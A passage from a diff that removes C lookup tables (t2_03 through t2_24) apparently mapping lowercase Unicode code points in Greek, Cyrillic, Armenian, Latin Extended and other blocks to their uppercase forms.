+-	0x0000, 0x0228, 0x0000, 0x022a, 0x0000, 0x022c, 0x0000, 0x022e,
+-	0x0000, 0x0230, 0x0000, 0x0232, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x023b, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0241, 0x0000, 0x0000, 0x0000, 0x0000, 0x0246,
+-	0x0000, 0x0248, 0x0000, 0x024a, 0x0000, 0x024c, 0x0000, 0x024e,
+-	0x2c6f, 0x2c6d, 0x0000, 0x0181, 0x0186, 0x0000, 0x0189, 0x018a,
+-	0x0000, 0x018f, 0x0000, 0x0190, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0193, 0x0000, 0x0000, 0x0194, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0197, 0x0196, 0x0000, 0x2c62, 0x0000, 0x0000, 0x0000, 0x019c,
+-	0x0000, 0x2c6e, 0x019d, 0x0000, 0x0000, 0x019f, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2c64, 0x0000, 0x0000,
+-	0x01a6, 0x0000, 0x0000, 0x01a9, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x01ae, 0x0244, 0x01b1, 0x01b2, 0x0245, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x01b7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_03[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0370, 0x0000, 0x0372, 0x0000, 0x0000, 0x0000, 0x0376,
+-	0x0000, 0x0000, 0x0000, 0x03fd, 0x03fe, 0x03ff, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0386, 0x0388, 0x0389, 0x038a,
+-	0x0000, 0x0391, 0x0392, 0x0393, 0x0394, 0x0395, 0x0396, 0x0397,
+-	0x0398, 0x0399, 0x039a, 0x039b, 0x039c, 0x039d, 0x039e, 0x039f,
+-	0x03a0, 0x03a1, 0x0000, 0x03a3, 0x03a4, 0x03a5, 0x03a6, 0x03a7,
+-	0x03a8, 0x03a9, 0x03aa, 0x03ab, 0x038c, 0x038e, 0x038f, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x03cf,
+-	0x0000, 0x03d8, 0x0000, 0x03da, 0x0000, 0x03dc, 0x0000, 0x03de,
+-	0x0000, 0x03e0, 0x0000, 0x03e2, 0x0000, 0x03e4, 0x0000, 0x03e6,
+-	0x0000, 0x03e8, 0x0000, 0x03ea, 0x0000, 0x03ec, 0x0000, 0x03ee,
+-	0x0000, 0x0000, 0x03f9, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x03f7, 0x0000, 0x0000, 0x03fa, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_04[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0410, 0x0411, 0x0412, 0x0413, 0x0414, 0x0415, 0x0416, 0x0417,
+-	0x0418, 0x0419, 0x041a, 0x041b, 0x041c, 0x041d, 0x041e, 0x041f,
+-	0x0420, 0x0421, 0x0422, 0x0423, 0x0424, 0x0425, 0x0426, 0x0427,
+-	0x0428, 0x0429, 0x042a, 0x042b, 0x042c, 0x042d, 0x042e, 0x042f,
+-	0x0400, 0x0401, 0x0402, 0x0403, 0x0404, 0x0405, 0x0406, 0x0407,
+-	0x0408, 0x0409, 0x040a, 0x040b, 0x040c, 0x040d, 0x040e, 0x040f,
+-	0x0000, 0x0460, 0x0000, 0x0462, 0x0000, 0x0464, 0x0000, 0x0466,
+-	0x0000, 0x0468, 0x0000, 0x046a, 0x0000, 0x046c, 0x0000, 0x046e,
+-	0x0000, 0x0470, 0x0000, 0x0472, 0x0000, 0x0474, 0x0000, 0x0476,
+-	0x0000, 0x0478, 0x0000, 0x047a, 0x0000, 0x047c, 0x0000, 0x047e,
+-	0x0000, 0x0480, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x048a, 0x0000, 0x048c, 0x0000, 0x048e,
+-	0x0000, 0x0490, 0x0000, 0x0492, 0x0000, 0x0494, 0x0000, 0x0496,
+-	0x0000, 0x0498, 0x0000, 0x049a, 0x0000, 0x049c, 0x0000, 0x049e,
+-	0x0000, 0x04a0, 0x0000, 0x04a2, 0x0000, 0x04a4, 0x0000, 0x04a6,
+-	0x0000, 0x04a8, 0x0000, 0x04aa, 0x0000, 0x04ac, 0x0000, 0x04ae,
+-	0x0000, 0x04b0, 0x0000, 0x04b2, 0x0000, 0x04b4, 0x0000, 0x04b6,
+-	0x0000, 0x04b8, 0x0000, 0x04ba, 0x0000, 0x04bc, 0x0000, 0x04be,
+-	0x0000, 0x0000, 0x04c1, 0x0000, 0x04c3, 0x0000, 0x04c5, 0x0000,
+-	0x04c7, 0x0000, 0x04c9, 0x0000, 0x04cb, 0x0000, 0x04cd, 0x04c0,
+-	0x0000, 0x04d0, 0x0000, 0x04d2, 0x0000, 0x04d4, 0x0000, 0x04d6,
+-	0x0000, 0x04d8, 0x0000, 0x04da, 0x0000, 0x04dc, 0x0000, 0x04de,
+-	0x0000, 0x04e0, 0x0000, 0x04e2, 0x0000, 0x04e4, 0x0000, 0x04e6,
+-	0x0000, 0x04e8, 0x0000, 0x04ea, 0x0000, 0x04ec, 0x0000, 0x04ee,
+-	0x0000, 0x04f0, 0x0000, 0x04f2, 0x0000, 0x04f4, 0x0000, 0x04f6,
+-	0x0000, 0x04f8, 0x0000, 0x04fa, 0x0000, 0x04fc, 0x0000, 0x04fe,
+-};
+-
+-static const wchar_t t2_05[256] = {
+-	0x0000, 0x0500, 0x0000, 0x0502, 0x0000, 0x0504, 0x0000, 0x0506,
+-	0x0000, 0x0508, 0x0000, 0x050a, 0x0000, 0x050c, 0x0000, 0x050e,
+-	0x0000, 0x0510, 0x0000, 0x0512, 0x0000, 0x0514, 0x0000, 0x0516,
+-	0x0000, 0x0518, 0x0000, 0x051a, 0x0000, 0x051c, 0x0000, 0x051e,
+-	0x0000, 0x0520, 0x0000, 0x0522, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0531, 0x0532, 0x0533, 0x0534, 0x0535, 0x0536, 0x0537,
+-	0x0538, 0x0539, 0x053a, 0x053b, 0x053c, 0x053d, 0x053e, 0x053f,
+-	0x0540, 0x0541, 0x0542, 0x0543, 0x0544, 0x0545, 0x0546, 0x0547,
+-	0x0548, 0x0549, 0x054a, 0x054b, 0x054c, 0x054d, 0x054e, 0x054f,
+-	0x0550, 0x0551, 0x0552, 0x0553, 0x0554, 0x0555, 0x0556, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_1d[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0xa77d, 0x0000, 0x0000, 0x0000, 0x2c63, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_1e[256] = {
+-	0x0000, 0x1e00, 0x0000, 0x1e02, 0x0000, 0x1e04, 0x0000, 0x1e06,
+-	0x0000, 0x1e08, 0x0000, 0x1e0a, 0x0000, 0x1e0c, 0x0000, 0x1e0e,
+-	0x0000, 0x1e10, 0x0000, 0x1e12, 0x0000, 0x1e14, 0x0000, 0x1e16,
+-	0x0000, 0x1e18, 0x0000, 0x1e1a, 0x0000, 0x1e1c, 0x0000, 0x1e1e,
+-	0x0000, 0x1e20, 0x0000, 0x1e22, 0x0000, 0x1e24, 0x0000, 0x1e26,
+-	0x0000, 0x1e28, 0x0000, 0x1e2a, 0x0000, 0x1e2c, 0x0000, 0x1e2e,
+-	0x0000, 0x1e30, 0x0000, 0x1e32, 0x0000, 0x1e34, 0x0000, 0x1e36,
+-	0x0000, 0x1e38, 0x0000, 0x1e3a, 0x0000, 0x1e3c, 0x0000, 0x1e3e,
+-	0x0000, 0x1e40, 0x0000, 0x1e42, 0x0000, 0x1e44, 0x0000, 0x1e46,
+-	0x0000, 0x1e48, 0x0000, 0x1e4a, 0x0000, 0x1e4c, 0x0000, 0x1e4e,
+-	0x0000, 0x1e50, 0x0000, 0x1e52, 0x0000, 0x1e54, 0x0000, 0x1e56,
+-	0x0000, 0x1e58, 0x0000, 0x1e5a, 0x0000, 0x1e5c, 0x0000, 0x1e5e,
+-	0x0000, 0x1e60, 0x0000, 0x1e62, 0x0000, 0x1e64, 0x0000, 0x1e66,
+-	0x0000, 0x1e68, 0x0000, 0x1e6a, 0x0000, 0x1e6c, 0x0000, 0x1e6e,
+-	0x0000, 0x1e70, 0x0000, 0x1e72, 0x0000, 0x1e74, 0x0000, 0x1e76,
+-	0x0000, 0x1e78, 0x0000, 0x1e7a, 0x0000, 0x1e7c, 0x0000, 0x1e7e,
+-	0x0000, 0x1e80, 0x0000, 0x1e82, 0x0000, 0x1e84, 0x0000, 0x1e86,
+-	0x0000, 0x1e88, 0x0000, 0x1e8a, 0x0000, 0x1e8c, 0x0000, 0x1e8e,
+-	0x0000, 0x1e90, 0x0000, 0x1e92, 0x0000, 0x1e94, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x1ea0, 0x0000, 0x1ea2, 0x0000, 0x1ea4, 0x0000, 0x1ea6,
+-	0x0000, 0x1ea8, 0x0000, 0x1eaa, 0x0000, 0x1eac, 0x0000, 0x1eae,
+-	0x0000, 0x1eb0, 0x0000, 0x1eb2, 0x0000, 0x1eb4, 0x0000, 0x1eb6,
+-	0x0000, 0x1eb8, 0x0000, 0x1eba, 0x0000, 0x1ebc, 0x0000, 0x1ebe,
+-	0x0000, 0x1ec0, 0x0000, 0x1ec2, 0x0000, 0x1ec4, 0x0000, 0x1ec6,
+-	0x0000, 0x1ec8, 0x0000, 0x1eca, 0x0000, 0x1ecc, 0x0000, 0x1ece,
+-	0x0000, 0x1ed0, 0x0000, 0x1ed2, 0x0000, 0x1ed4, 0x0000, 0x1ed6,
+-	0x0000, 0x1ed8, 0x0000, 0x1eda, 0x0000, 0x1edc, 0x0000, 0x1ede,
+-	0x0000, 0x1ee0, 0x0000, 0x1ee2, 0x0000, 0x1ee4, 0x0000, 0x1ee6,
+-	0x0000, 0x1ee8, 0x0000, 0x1eea, 0x0000, 0x1eec, 0x0000, 0x1eee,
+-	0x0000, 0x1ef0, 0x0000, 0x1ef2, 0x0000, 0x1ef4, 0x0000, 0x1ef6,
+-	0x0000, 0x1ef8, 0x0000, 0x1efa, 0x0000, 0x1efc, 0x0000, 0x1efe,
+-};
+-
+-static const wchar_t t2_1f[256] = {
+-	0x1f08, 0x1f09, 0x1f0a, 0x1f0b, 0x1f0c, 0x1f0d, 0x1f0e, 0x1f0f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f18, 0x1f19, 0x1f1a, 0x1f1b, 0x1f1c, 0x1f1d, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f28, 0x1f29, 0x1f2a, 0x1f2b, 0x1f2c, 0x1f2d, 0x1f2e, 0x1f2f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f38, 0x1f39, 0x1f3a, 0x1f3b, 0x1f3c, 0x1f3d, 0x1f3e, 0x1f3f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f48, 0x1f49, 0x1f4a, 0x1f4b, 0x1f4c, 0x1f4d, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x1f59, 0x0000, 0x1f5b, 0x0000, 0x1f5d, 0x0000, 0x1f5f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f68, 0x1f69, 0x1f6a, 0x1f6b, 0x1f6c, 0x1f6d, 0x1f6e, 0x1f6f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fba, 0x1fbb, 0x1fc8, 0x1fc9, 0x1fca, 0x1fcb, 0x1fda, 0x1fdb,
+-	0x1ff8, 0x1ff9, 0x1fea, 0x1feb, 0x1ffa, 0x1ffb, 0x0000, 0x0000,
+-	0x1f88, 0x1f89, 0x1f8a, 0x1f8b, 0x1f8c, 0x1f8d, 0x1f8e, 0x1f8f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f98, 0x1f99, 0x1f9a, 0x1f9b, 0x1f9c, 0x1f9d, 0x1f9e, 0x1f9f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fa8, 0x1fa9, 0x1faa, 0x1fab, 0x1fac, 0x1fad, 0x1fae, 0x1faf,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fb8, 0x1fb9, 0x0000, 0x1fbc, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x1fcc, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fd8, 0x1fd9, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fe8, 0x1fe9, 0x0000, 0x0000, 0x0000, 0x1fec, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x1ffc, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_21[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2132, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x2160, 0x2161, 0x2162, 0x2163, 0x2164, 0x2165, 0x2166, 0x2167,
+-	0x2168, 0x2169, 0x216a, 0x216b, 0x216c, 0x216d, 0x216e, 0x216f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x2183, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_24[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x24b6, 0x24b7, 0x24b8, 0x24b9, 0x24ba, 0x24bb, 0x24bc, 0x24bd,
+-	0x24be, 0x24bf, 0x24c0, 0x24c1, 0x24c2, 0x24c3, 0x24c4, 0x24c5,
+-	0x24c6, 0x24c7, 0x24c8, 0x24c9, 0x24ca, 0x24cb, 0x24cc, 0x24cd,
